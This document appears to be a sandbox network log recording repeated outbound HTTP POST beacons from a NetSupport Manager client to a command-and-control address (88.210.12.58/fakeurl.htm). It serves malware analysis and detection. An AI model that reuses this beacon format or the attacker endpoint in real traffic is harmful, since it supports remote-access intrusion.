Dec 10, 2024 09:00:52.828227043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:52.929204941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.030260086 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.132962942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.232954979 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.332947969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.431238890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.532248974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.632230997 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.732950926 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.832242966 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:53.932864904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.034826040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.134296894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.234287024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.335254908 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.436263084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.537296057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.637275934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.737236977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.838289022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:54.938258886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.039268017 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.140969992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.241003990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.340967894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.441011906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.540973902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.641278028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.742249966 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.843306065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:55.944252968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:56.044294119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:56.145328999 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.072272062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.172281027 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.275093079 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.373289108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.475065947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.575023890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.675162077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.775270939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.876259089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:57.979110956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.081115007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.182351112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.283308029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.383435965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.484302044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.585505962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.686317921 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.786307096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.887317896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:58.987289906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.088306904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.196523905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.299067974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.403079987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.522634983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.623354912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.727200031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.823323965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:59.923307896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.024297953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.124758959 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.225347042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.325347900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.426320076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.526400089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.627515078 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.727334023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.827339888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:00.927352905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.027369976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.127316952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.227360964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.327352047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.428311110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.528337002 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.631047010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.730320930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.831824064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:01.933051109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.033061028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.132399082 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.233333111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.333343983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.433389902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.534336090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.634385109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.734352112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.835380077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:02.935372114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
